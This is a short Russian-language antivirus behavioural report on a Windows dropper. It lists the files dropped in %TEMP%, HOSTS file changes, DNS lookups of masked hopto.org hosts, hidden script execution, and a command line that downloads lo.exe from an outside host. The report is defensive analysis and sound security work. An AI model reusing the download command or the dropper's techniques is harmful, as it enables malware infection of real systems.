Техническая информация
Вредоносные функции
Запускает на исполнение
- '%WINDIR%\syswow64\taskkill.exe' /im praetorian.exe
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\eeb1.tmp\bat.bat
- %TEMP%\eeb1.tmp\2weulcgpqpp
- %TEMP%\eeb1.tmp\3weulcgpqpp.vbs
- %TEMP%\eeb1.tmp\4weulcgpqpp.vbs
- %TEMP%\eeb1.tmp\5weulcgpqpp.exe
- %TEMP%\eeb1.tmp\1weulcgpqpp
Изменяет файл HOSTS.
Сетевая активность
UDP
- DNS ASK we#####qpp.hopto.org
- DNS ASK cy####.hopto.org
Другое
Ищет следующие окна
- ClassName: '' WindowName: ''
Создает и запускает на исполнение
- '%WINDIR%\syswow64\wscript.exe' "%TEMP%\EEB1.tmp\3weulcgpqpp.vbs"
- '%WINDIR%\syswow64\wscript.exe' "%TEMP%\EEB1.tmp\4weulcgpqpp.vbs"
- '%TEMP%\eeb1.tmp\5weulcgpqpp.exe' "http://we#####qpp.hopto.org/lo.exe" --output-document="%LOCALAPPDATA%\Temp/lo.exe"
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\EEB1.tmp\bat.bat" "' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\EEB1.tmp\bat.bat" "
